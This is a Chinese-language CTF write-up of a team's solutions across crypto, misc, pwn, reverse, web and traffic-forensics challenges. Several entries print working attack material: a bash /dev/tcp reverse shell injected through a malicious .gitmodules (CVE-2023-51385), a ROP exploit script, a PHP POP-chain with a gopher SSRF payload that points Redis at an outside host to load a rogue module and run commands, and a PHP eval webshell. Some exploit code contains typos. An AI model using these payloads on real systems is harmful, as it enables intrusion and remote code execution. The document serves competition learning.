题目序号 可信计算(基于挑战码的双向认证1、基于挑战码的双向认证2)
操作内容:
(非预期)
直接访问/root/cube-shell/instance/flag_server/目录
该目录下有一个文件名为:flag.list的文件进行访问得到flag1和flag2
flag值:flag1:flag{59865080-ea07-430f} flag2:flag{80ba3807-b659-4c2c}
题目序号 Cypto(not_wiener)
操作内容:
发现维纳攻击求a范围不够,所以使用Boneh and Durfee Attack
from Crypto.Util.number import *
N = 98871082998654651904594468693622517613869880791884929588100914778964766348914919202255397776583412976785216592924335179128220634848871563960167726280836726035489482233158897362166942091133366827965811201438682117312550600943385153640907629347663140487841016782054145413246763816202055243693289693996466579973
e = 76794907644383980853714814867502708655721653834095293468287239735547303515225813724998992623067007382800348003887194379223500764768679311862929538017193078946067634221782978912767213553254272722105803768005680182504500278005295062173004098796746439445343896868825218704046110925243884449608326413259156482881
c = 13847199761503953970544410090850216804358289955503229676987212195445226107828814170983735135692611175621170777484117542057117607579344112008580933900051471041224296342157618857321522682033260246480258856376097987259016643294843196752685340912823459403703609796624411954082410762846356541101561523204985391564
"""
Setting debug to true will display more informations
about the lattice, the bounds, the vectors...
"""
debug = False
"""
Setting strict to true will stop the algorithm (and
return (-1, -1)) if we don't have a correct
upperbound on the determinant. Note that this
doesn't necesseraly mean that no solutions
will be found since the theoretical upperbound is
usualy far away from actual results. That is why
you should probably use `strict = False`
"""
strict = False
"""
This is experimental, but has provided remarkable results
so far. It tries to reduce the lattice as much as it can
while keeping its efficiency. I see no reason not to use
this option, but if things don't work, you should try
disabling it
"""
helpful_only = True
dimension_min = 7 # stop removing if lattice reaches that dimension
############################################
# Functions
##########################################
# display stats on helpful vectors
def helpful_vectors(BB, modulus):
nothelpful = 0
for ii in range(BB.dimensions()[0]):
if BB[ii, ii] >= modulus:
nothelpful += 1
print(nothelpful, "/", BB.dimensions()[0], " vectors are not helpful")
# display matrix picture with 0 and X
def matrix_overview(BB, bound):
for ii in range(BB.dimensions()[0]):
a = ('%02d ' % ii)
for jj in range(BB.dimensions()[1]):
a += '0' if BB[ii, jj] == 0 else 'X'
if BB.dimensions()[0] < 60:
a += ' '
if BB[ii, ii] >= bound:
a += '~'
print(a)
# tries to remove unhelpful vectors
# we start at current = n-1 (last vector)
def remove_unhelpful(BB, monomials, bound, current):
# end of our recursive function
if current == -1 or BB.dimensions()[0] <= dimension_min:
return BB
# we start by checking from the end
for ii in range(current, -1, -1):
# if it is unhelpful:
if BB[ii, ii] >= bound:
affected_vectors = 0
affected_vector_index = 0
# let's check if it affects other vectors
for jj in range(ii + 1, BB.dimensions()[0]):
# if another vector is affected:
# we increase the count
if BB[jj, ii] != 0:
affected_vectors += 1
affected_vector_index = jj
# level:0
# if no other vectors end up affected
# we remove it
if affected_vectors == 0:
# print("* removing unhelpful vector", ii)
BB = BB.delete_columns([ii])
BB = BB.delete_rows([ii])
monomials.pop(ii)
BB = remove_unhelpful(BB, monomials, bound, ii - 1)
return BB
# level:1
# if just one was affected we check
# if it is affecting someone else
elif affected_vectors == 1:
affected_deeper = True
for kk in range(affected_vector_index + 1, BB.dimensions()[0]):
# if it is affecting even one vector
# we give up on this one
if BB[kk, affected_vector_index] != 0:
affected_deeper = False
# remove both it if no other vector was affected and
# this helpful vector is not helpful enough
# compared to our unhelpful one
if affected_deeper and abs(bound - BB[affected_vector_index, affected_vector_index]) < abs(
bound - BB[ii, ii]):
# print("* removing unhelpful vectors", ii, "and", affected_vector_index)
BB = BB.delete_columns([affected_vector_index, ii])
BB = BB.delete_rows([affected_vector_index, ii])
monomials.pop(affected_vector_index)
monomials.pop(ii)
BB = remove_unhelpful(BB, monomials, bound, ii - 1)
return BB
# nothing happened
return BB
"""
Returns:
* 0,0 if it fails
* -1,-1 if `strict=true`, and determinant doesn't bound
* x0,y0 the solutions of `pol`
"""
def boneh_durfee(pol, modulus, mm, tt, XX, YY):
"""
Boneh and Durfee revisited by Herrmann and May
finds a solution if:
* d < N^delta
* |x| < e^delta
* |y| < e^0.5
whenever delta < 1 - sqrt(2)/2 ~ 0.292
"""
# substitution (Herrman and May)
PR.<u,x,y> = PolynomialRing(ZZ)
Q = PR.quotient(x * y + 1 - u) # u = xy + 1
polZ = Q(pol).lift()
UU = XX * YY + 1
# x-shifts
gg = []
for kk in range(mm + 1):
for ii in range(mm - kk + 1):
xshift = x ^ ii * modulus ^ (mm - kk) * polZ(u, x, y) ^ kk
gg.append(xshift)
gg.sort()
# x-shifts list of monomials
monomials = []
for polynomial in gg:
for monomial in polynomial.monomials():
if monomial not in monomials:
monomials.append(monomial)
monomials.sort()
# y-shifts (selected by Herrman and May)
for jj in range(1, tt + 1):
for kk in range(floor(mm / tt) * jj, mm + 1):
yshift = y ^ jj * polZ(u, x, y) ^ kk * modulus ^ (mm - kk)
yshift = Q(yshift).lift()
gg.append(yshift) # substitution
# y-shifts list of monomials
for jj in range(1, tt + 1):
for kk in range(floor(mm / tt) * jj, mm + 1):
monomials.append(u ^ kk * y ^ jj)
# construct lattice B
nn = len(monomials)
BB = Matrix(ZZ, nn)
for ii in range(nn):
BB[ii, 0] = gg[ii](0, 0, 0)
for jj in range(1, ii + 1):
if monomials[jj] in gg[ii].monomials():
BB[ii, jj] = gg[ii].monomial_coefficient(monomials[jj]) * monomials[jj](UU, XX, YY)
# Prototype to reduce the lattice
if helpful_only:
# automatically remove
BB = remove_unhelpful(BB, monomials, modulus ^ mm, nn - 1)
# reset dimension
nn = BB.dimensions()[0]
if nn == 0:
print("failure")
return 0, 0
# check if vectors are helpful
if debug:
helpful_vectors(BB, modulus ^ mm)
# check if determinant is correctly bounded
det = BB.det()
bound = modulus ^ (mm * nn)
if det >= bound:
# print("We do not have det < bound. Solutions might not be found.")
# print("Try with highers m and t.")
if debug:
diff = (log(det) - log(bound)) / log(2)
# print("size det(L) - size e^(m*n) = ", floor(diff))
if strict:
return -1, -1
else:
print("det(L) < e^(m*n) (good! If a solution exists < N^delta, it will be found)")
# display the lattice basis
if debug:
matrix_overview(BB, modulus ^ mm)
# LLL
if debug:
print("optimizing basis of the lattice via LLL, this can take a long time")
BB = BB.LLL()
if debug:
print("LLL is done!")
# transform vector i & j -> polynomials 1 & 2
if debug:
print("looking for independent vectors in the lattice")
found_polynomials = False
for pol1_idx in range(nn - 1):
for pol2_idx in range(pol1_idx + 1, nn):
# for i and j, create the two polynomials
PR.<w,z> = PolynomialRing(ZZ)
pol1 = pol2 = 0
for jj in range(nn):
pol1 += monomials[jj](w * z + 1, w, z) * BB[pol1_idx, jj] / monomials[jj](UU, XX, YY)
pol2 += monomials[jj](w * z + 1, w, z) * BB[pol2_idx, jj] / monomials[jj](UU, XX, YY)
# resultant
PR.<q> = PolynomialRing(ZZ)
rr = pol1.resultant(pol2)
# are these good polynomials?
if rr.is_zero() or rr.monomials() == [1]:
continue
else:
# print("found them, using vectors", pol1_idx, "and", pol2_idx)
found_polynomials = True
break
if found_polynomials:
break
if not found_polynomials:
# print("no independant vectors could be found. This should very rarely happen...")
return 0, 0
rr = rr(q, q)
# solutions
soly = rr.roots()
if len(soly) == 0:
# print("Your prediction (delta) is too small")
return 0, 0
soly = soly[0][0]
ss = pol1(q, soly)
solx = ss.roots()[0][0]
#
return solx, soly
delta = .271 # this means that d < N^delta
m = 8 # size of the lattice (bigger the better/slower)
t = int((1 - 2 * delta) * m) # optimization from Herrmann and May
X = 2 * floor(N ^ delta) # this _might_ be too much
Y = floor(N ^ (1 / 2)) # correct if p, q are ~ same size
P.<x,y> = PolynomialRing(ZZ)
A = int((N + 1) / 2)
pol = 1 + x * (A + y)
solx, soly = boneh_durfee(pol, e, m, t, X, Y)
d = int(pol(solx, soly) / e)
print(d)
m = power_mod(c, d, N)
可以求出
a=24601959430759983424400804734518943158892550216065342062971649989571838687333
用已有的·数据进行k相关攻击.
from Crypto.Util.number import *
a=24601959430759983424400804734518943158892550216065342062971649989571838687333
b=17474742587088593627
p= 161310487790785086482919800040790794252181955976860261806376528825054571226885460699399582301663712128659872558133023114896223014064381772944582265101778076462675402208451386747128794418362648706087358197370036248544508513485401475977401111270352593919906650855268709958151310928767086591887892397722958234379
q= 1115861146902610160756777713087325311747309309771
g= 61073566757714587321114447684333928353300944355112378054603585955730395524359123615359185275743626350773632555967063692889668342544616165017003197599818881844811647270423070958521148291118914198811187731689123176313367399492561288350530256722898205674043032421874788802819858438796795768177550638273020791962
y= 23678147495254433946472657196764372220306841739888385605070426528738230369489739339976134564575544246606937803367113623097260181789372915552172469427842482448570540429192377881186772226796452797182435452490307834205012154495575570994963829345053331967442452842152258650027916313982835119514473311305158299360
(h1, r1, s1) = 535874494834828755542711401117152397489711233142, 117859946800380767356190121030392492081340616512, 26966646740134065096660259687229179143947213779
(h2, r2, s2) = 236574518096866758760287021848258048065293279716, 863199000523521111517835459866422731857447792677, 517924607931342012033031470185302567344725962419
k = (h1*r2 - h2*r1 + b*s2*r1) * inverse(s1*r2 - a*s2*r1, q) % q
x = (k*s1 - h1) * inverse(r1, q) %q
print(long_to_bytes(x))
得到最终flag
flag值:flag{l1near_k1s_unsafe}
题目序号 MISC(modules)
操作内容:
根据题目提示,在GitHub找到这个仓库,由于靶机不能访问GitHub故fork到gitlab
在库中新增exp.sh文件
bash -i >& /dev/tcp/IP地址/端口号0>&1
反弹shell
用服务器监听
修改库中的.gitmodules文件
[submodule "cve"]
path = cve
url = ssh://`bash exp.sh`foo.ichunqiu.com/bar
最后到靶机输入仓库地址
u test / CVE-2023-51385_test · GitLab
git clone https://gitlab.com/testu2584/CVE-2023-51385_test.git --recurse-submodules
即可
flag值:flag{ec993bca-5790-4b17-9830-785079885277}
题目序号 MISC(谁偷吃了我的外卖)
操作内容:
使用foremost将图片小凯.jpg中的压缩包提取出来
通过查看压缩包大致猜测为将文件名全部提取出来,根据文件的序号进行排序,再将下划线后面的密文进行拼接得到最终密文
import zipfile
import re
import os
def get_filenames_from_zip(zip_path, output_file):
with zipfile.ZipFile(zip_path, 'r') as zf:
filenames = "\n".join([name.encode('cp437').decode('gbk') for name in zf.namelist()])
with open(output_file, 'w', encoding='utf-8') as f:
f.write(filenames)
zip_path = r"C:\Users\32541\Desktop\外卖箱.zip"
output_file = 'filenames.txt'
get_filenames_from_zip(zip_path, output_file)
with open('filenames.txt', 'r', encoding='utf-8') as f:
lines = f.readlines()
user_lines = [line for line in lines if line.startswith('外卖箱/用户')]
sorted_user_lines = sorted(user_lines, key=lambda x: int(x.split('用户')[1].split('_')[0]))
with open('sorted_filenames.txt', 'w', encoding='utf-8') as f:
for line in sorted_user_lines:
f.write(line)
with open('sorted_filenames.txt', 'r', encoding='utf-8') as file:
lines = file.readlines()
result = ''
for line in lines:
match = re.search(r'_(.*?)的', line)
if match:
result += match.group(1)
with open('result.txt', 'w') as file:
file.write(result)
最后通过提示
将-替换成/后base64解码得到文件后保存(工具:https://the-x.cn/encodings/Base64.aspx)
将保存后的文件继续foremost解密得到新的压缩包
打开压缩包发现报错通过压缩包工具修复
文件内容:
最后通过这个装有钥匙.png的文件作为明文文件对之前的外卖箱.zip进行明文解密
最终得到解密后的zip文件
打开进入flag文件夹
查看小凯的奋斗故事.md
得到第一段flag:flag{W1sh_y0u_AaaAaaaa
查看txt.galf
倒叙得到第二段flag:aaaaaaa_w0nderfu1_CTF_journe9}
最后得到falg:
flag值:flag{W1sh_y0u_AaaAaaaaaaaaaaa_w0nderfu1_CTF_journe9}
题目序号MISC(明文混淆)
操作内容:
根据题目描述可以大致猜想到压缩包为明文攻击,shell文件进行了代码混淆说明只有从license.txt文件下手,找到电脑中其他的license.txt发现大多数文件内容都是大同小异,使用bkcrack直接开始明文攻击。
7163444a 203b76b0 17de1387
得到了三个密钥,将文件提取出来
使用这个网址做解混淆的第一步UnPHP - The Online PHP Decoder
将这一段复制到shell2.php里面,将eval换成echo
得到如下代码:
?><?php
eval(gzinflate(base64_decode('U0gtS8zRcFCJD/APDolWT8tJTK8uNswt8DGOrzIsiHfIS4kvNzYzzUj1yVFUVKxVj9W0trcDAA==')));
?> eval(@$_POST['flag{s1mpL3_z1p_@nd_w365heLl!!!}']);?>
flag值:flag{s1mpL3_z1p_@nd_w365heLl!!!}
题目序号 PWN(nmanager)
操作内容:
下载附件进行分析
得知64位文件,开启了Canary保护和NX保护,放64位IDA进行反编译
编写出Exp:
from ctypes import *
from pwn import *
import time
io = remote('ip' ,端口)
dl = CDLL('./libc.so.6')
dl.srand(int(time.time()))
c = list('0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ')
c = c[dl.rand() % 62]
io.sendline(str(c))
io.recvuntil('modify')
io.sendline(str(-1))
io.recvuntil('gender: ')
io.send('A'*8)
io.recvuntil('age: ')
io.sendline(p64(0x4142))
io.recvuntil('name: ')
io.send('B')
io.recvuntil('A'*0x8)
libc_base = u64(io.recv(6)+b2*'\x00') - 528426
libc = ELF('libc.so.6')
io.recvuntil(')')
io.sendline('n')
pop_rdi=rdi =libc_base+0x2a3e5
ret=pop_rdi+1
system=libc_base+libc.sym['system']
bin_sh=libc_base+next(libc.search(b'/bin/sh'))
pay=p64(pop_rdi)+p64(bin_sh)+p64(system)
io.recvuntil('modify')
io.sendline(str(-1))
io.recvuntil('gender: ')
io.send('C'*'10')
io.recvuntil('age: ')
io.sendline(p64(ret))
io.recvuntil('name: ')
io.send(b'A'*7+p64(retu)*3+pay)
io.interactive()
得flag
flag值:flag{46d45ed7-f76b-4d3b-9095-360c434844cb}
题目序号 RE(UPX2023)
操作内容:
key = [111, 24, 236, 196, 58, 186, 93, 97, 61, 51, 169, 170, 2, 17, 113, 139, 162, 38, 14, 77, 131, 66, 112, 202, 80, 113, 231, 107, 15, 50, 159, 128, 155, 183, 227, 184, 224, 28, 16, 180, 42,57]
flag = [ 0x09, 0x63, 0xD9, 0xF6, 0x58, 0xDD, 0x3F, 0x4C, 0x0F, 0x0B, 0x98, 0xC6, 0x65, 0x21, 0x41, 0xED, 0xC4, 0x0B, 0x3A, 0x7B, 0xE5, 0x75, 0x5D, 0xA9, 0x31, 0x41, 0xD7, 0x52, 0x6C, 0x0A, 0xFA, 0xFD, 0xFA, 0x84, 0xDB, 0x89, 0xCD, 0x7E, 0x27, 0x85, 0x13,8 ]
string1 = 'QAZWSXEDCRFVTGBYHNUJMIKOLP0987654321{}-!@#'
string2 = 'QV4TAG3BZY2HWN1USJ{MXI}KEO-LDP!0C9@8R7#6F5'
sx = ''
for i in range(len(flag)):
sx += chr(flag[i]^(key[i]))
for i in string2:
print(sx[string1.index(i)],end='')
flag值:flag{0305f8f2-14b6-fg7b-bc7a-010299c881e1}
题目序号WEB(ezezez_php)
操作内容:
通过审题可知是一题pop链,链子如下:
Ha->__destruct()->Rd->__call()->Er->__set($name, $value)->get($url)
Exp:
<?php
highlight_file(__FILE__);
include "function.php";
class Rd
{
public $ending;
public $cl;
public $poc;
public function __destruct()
{
echo "All matters have concluded"."</br>";
}
public function __call($name, $arg)
{
foreach ($arg as $key => $value) {
if ($arg[0]['POC'] == "0.o") {
$this->cl->var1 = "get";
}
}
}
}
class Poc
{
public $payload;
public $fun;
public function __set($name, $value)
{
$this->payload = $name;
$this->fun = $value;
}
function getflag($paylaod)
{
echo "Have you genuinely accomplished what you set out to do?"."</br>";
file_get_contents($paylaod);
}
}
class Er
{
public $symbol;
public $Flag;
public function __construct()
{
$this->symbol = True;
}
public function __set($name, $value)
{
if (preg_match('/^(file|http|https|gopher|dict)?:\/\/.*(\/)?.*$/',base64_decode($this->Flag))){ $value($this->Flag);
}
else {
echo "NoNoNo,please you can look hint.php"."</br>";
}
}
}
class Ha
{
public $start;
public $start1;
public $start2;
public function __construct()
{
echo $this->start1 . "__construct" . "</br>";
}
public function __destruct()
{
if ($this->start2 === "o.0") {
$this->start1->Love($this->start);
echo "You are Good!"."</br>";
}
}
}
function get($url) {
$url=base64_decode($url);
var_dump($url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
$result_info = curl_getinfo($ch);
var_dump($result_info);
curl_close($ch);
var_dump($output);
}
$a=new Ha();
$a->start=array('POC' => '0.o');
$a->start2="o.0";
$a->start1=new Rd();
$a->start1->cl=new Er();
$a->start1->cl->Flag=base64_encode('gopher://127.0.0.1:6379/_%2A3%0D%0A%247%0D%0ASLAVEOF%0D%0A%2414%0D%0A116.62.194.130%0D%0A%244%0D%0A6666%0D%0A%2A4%0D%0A%246%0D%0ACONFIG%0D%0A%243%0D%0ASET%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/tmp/%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%246%0D%0Aexp.so%0D%0A%2A3%0D%0A%246%0D%0AMODULE%0D%0A%244%0D%0ALOAD%0D%0A%2411%0D%0A/tmp/exp.so%0D%0A%2A2%0D%0A%2411%0D%0Asystem.exec%0D%0A%243%0D%0Aenv%0D%0A%2A1%0D%0A%244%0D%0Aquit%0D%0A');
echo serialize($a);
?>
然后发现get函数里的东西好像见过,然后找到了原题:网鼎杯 2020 玄武杯 SSRFMe
需要下载两个工具:
redis-rogue-server-master 和 redis-ssrf-master
然后吧redis-rogue-server-master的exp.so放入redis-ssrf-master里然后放入公网服务器里
然后修改ssrf-redis.py文件,将lhost修改为公网服务器的ip地址又因为没有密码,所以其他的不动
让后写一个sh类型的文件写入一下内容,因为rogue-server.py连接一次成功后就会终端,但是exp.so不一定传输完,所以会造成失败,所以写一个死循环用于持续调用文件(注意这里一定使用python2执行文件,否则会造成报错)
然后执行ssrf-redis.py生成payload
将payload进行base64编码后给exp的Flag
执行exp获得最终payload
然后执行sh文件,一下是正常执行的界面
最后将最终payload通过post传参给pop变量得到flag(注意这里可能不成功,多试几次就行了)
flag值:flag{83179b08-eda0-494f-bc45-5a7b88dad4ca}
题目序号-挑战题(勒索流量)
操作内容:
通过题目提示关注了勒索病毒头条,发送被加密的流量得到题目提示,时间戳通过Epoch Time
打开流量包发现http流量发现存在upload.php文件上传页面进行分析
发现使用了system函数进行了命令执行
对流量进行一一审计发现使用一句话木马
在后面的分析中发现主要是依靠蚁剑的马去做了一些操作
蚁剑流量执行命令的话主要看最后一个传参的base64编码,然后删去前面的两个字符就可以解密 解回显的内容的话就是删除前面和后面的十六进制,差不多追踪到41流时,看到一大串十六进制中发现了504B放入HEX当中后发现docx的文件特征
接着往后看在49流时发现加密使用的python脚本,对其进行分析发现运行报错,端口出现了问题后对其脚本端口位置修改为9999,然后对server.py脚本进行审计
时间戳根据提示可以获得,但是正确的时间戳不在数据包里,需要爆破从1705562720- 1705562860 这是时间戳的位置
然后再将9999端口的十六进制拿出来一个一个解,确定 16c3b2c295c3be04c29cc29fc3a90cc39ec2a3c39937c391c3a7c3811cc38bc3a0c39b29c29ac2b1c3 b830c3b2c286c3a13cc38ac296c38d13c3a2c29dc3920bc3bac2a8c2bb22c29bc287c3a328c3afc29 cc3bd27c390c3a6c38110c381c2a5c381 为flag
flag值:flag{3741b40e-3185-4a9a-80a6-83403e4942fc}
题目序号-挑战题(ezdede)
操作内容:
通过题目提示关注了勒索病毒头条,发送被加密的流量得到题目提示,得知织梦CMS的版本为V5.7.112的后台RCE,并获得后台口令密码为:admin@123
访问dede登录后台成功后
登录进去后访问模板下的默认模板管理后拉到最下面新建模板,命名为123.htm,内容写上:<?Php echo file_get_contents('/flag'); 用来读取根目录flag
再访问核心下的频道模型下的单页文档管理
增加一个页面进行如下操作后保存
然后访问/a/123.php得到flag
flag值:flag{3298da6f-83a6-4cde-bec4-1e22f6f311b7}
题目序号-RDG(had00p)
操作内容:
直接上传平台给的demo文件即可防御成功,应该是非预期了
扫一扫
1556
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
